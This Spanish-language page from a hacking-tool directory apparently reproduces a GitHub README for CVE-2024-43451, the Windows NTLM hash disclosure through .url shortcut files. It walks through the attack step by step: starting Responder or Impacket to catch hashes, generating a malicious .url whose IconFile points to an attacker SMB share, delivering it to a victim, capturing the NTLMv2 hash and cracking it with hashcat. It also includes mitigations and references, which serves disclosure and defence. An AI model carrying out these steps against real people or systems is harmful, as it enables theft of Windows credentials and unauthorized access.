Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — Reproducción de CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
Herramientas/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Descifrado de ContraseñasHerramientas de PhishingReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

Reproducción de CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction

Ver Repositorio
hace 28 díasAún no revisado

CVE-2024-43451 — Vulnerabilidad de suplantación de identidad de divulgación de hash NTLM en Windows

Descripción general

CVE-2024-43451 es una vulnerabilidad de suplantación de identidad de divulgación de hash NTLMv2 en Windows. Permite que un atacante remoto no autenticado filtre el hash NTLM de la víctima convenciéndola de que interactúe con un archivo de acceso directo .url malicioso. La vulnerabilidad se activa con una interacción mínima del usuario — basta con hacer clic derecho, eliminar o mover el archivo para filtrar el hash. Tiene una puntuación CVSS de 6.5 (Media) y ha sido explotada activamente en entornos reales. CISA la añadió al catálogo de Vulnerabilidades Explotadas Conocidas (KEV).

Detalles técnicos

Autenticación NTLM

NTLM (NT LAN Manager) es un protocolo de autenticación por desafío-respuesta utilizado por Windows. Cuando un cliente intenta acceder a un recurso a través de SMB, el cliente y el servidor realizan un handshake:

  1. El cliente envía un NEGOTIATE_MESSAGE con las capacidades admitidas.
  2. El servidor responde con un CHALLENGE_MESSAGE que contiene un nonce de 8 bytes (desafío del servidor).
  3. El cliente responde con un AUTHENTICATE_MESSAGE que contiene el hash NTLMv2 — un HMAC-MD5 del desafío combinado con el hash de la contraseña del usuario, el nombre de usuario y el dominio.

Si un atacante puede observar o provocar un intento de autenticación NTLM hacia una máquina que controle, el AUTHENTICATE_MESSAGE capturado puede ser descifrado sin conexión para recuperar la contraseña en texto plano.

Formato de archivo .url

Un archivo .url es un archivo de acceso directo utilizado por Internet Explorer y el Explorador de Windows para almacenar enlaces. Es un archivo con formato INI que contiene una sección [InternetShortcut]. Los campos críticos para la explotación son:

  • URL= — la URL de destino que Windows abrirá.
  • IconFile= — una ruta UNC opcional a un recurso de icono. Cuando el Explorador de Windows renderiza el archivo, intenta automáticamente recuperar el icono del recurso compartido remoto, lo que provoca un intento de autenticación NTLM contra el servidor del atacante.

Vector de ataque

El atacante crea un archivo .url con un parámetro IconFile que apunta a \\attacker-ip\share\icon.ico. Cuando la víctima:

  • Hace clic derecho sobre el archivo (el Explorador de Windows obtiene el icono para el menú contextual),
  • Mueve o copia el archivo (el icono se vuelve a leer), o
  • Elimina el archivo (el icono se obtiene para el cuadro de diálogo de la papelera de reciclaje),

el Explorador de Windows intenta cargar el icono desde la ruta UNC, enviando el hash NTLMv2 de la víctima al listener SMB del atacante (por ejemplo, Responder).

Versiones afectadas

Todas las versiones compatibles de Windows anteriores a la actualización del Patch Tuesday de noviembre de 2024:

  • Windows 10 (todas las versiones)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Las versiones antiguas no compatibles también son probablemente vulnerables, pero no recibirán parches.

Configuración de la explotación

Requisitos

  • Máquina del atacante: Linux o Windows con una herramienta de captura SMB (por ejemplo, Responder, smbserver de Impacket o Inveigh).
  • Máquina de la víctima: cualquier sistema Windows sin parchear.
  • Acceso a la red: la víctima debe poder alcanzar la IP del atacante en el puerto 445 (SMB).

Herramientas

HerramientaDescripción
ResponderEnvenenador de LLMNR/NBT-NS/mDNS con servidor SMB integrado para la captura de hashes

Pasos de reproducción

1. Iniciar el listener SMB (máquina del atacante)

Con Responder:

root@kitploit:~
sudo responder -I eth0 -v

O con Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. Generar el archivo .url malicioso

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. Entregar el archivo a la víctima

  • Adjunto de correo electrónico, memoria USB, recurso compartido de archivos o descarga web.

4. Interacción de la víctima

Cualquiera de las siguientes acciones provoca la filtración del hash:

  • Clic derecho → el icono se obtiene para el menú contextual → el handshake NTLM se envía al atacante
  • Eliminar → el icono se obtiene para el cuadro de diálogo de confirmación
  • Mover/Copiar → el icono se vuelve a leer desde la ruta UNC
  • Simplemente ver la carpeta en vista Detalles o Iconos (carga del icono)

5. Capturar el hash

El listener SMB del atacante recibe un hash NTLMv2:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Descifrar el hash (sin conexión)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Prueba de concepto

root@kitploit:~
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

Mitigación

Referencias

  • Microsoft Security Response Center — CVE-2024-43451
  • Catálogo de Vulnerabilidades Explotadas Conocidas de CISA
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — Ataques dirigidos a Ucrania
  • Análisis de la campaña UAC-0194 / SparkRAT
Descargar herramienta
Impacket
smbserver.py puede utilizarse para alojar un recurso compartido SMB simple
InveighHerramienta de captura NTLM basada en PowerShell para Windows
MitigaciónDescripción
Aplicar el parche de noviembre de 2024Instalar la actualización de seguridad de Microsoft de KB5044285
Bloquear SMB saliente (puerto 445)Evitar que los hashes NTLM salgan del perímetro de la red
Deshabilitar NTLM cuando sea posibleUsar autenticación solo con Kerberos
Habilitar la firma SMBEvita ataques de relay incluso si los hashes son capturados
Concienciación de usuariosEducar a los usuarios para que no interactúen con archivos .url inesperados
Restringir el manejo de archivos .urlUsar Directivas de Grupo para bloquear la ejecución o entrega de archivos .url por correo electrónico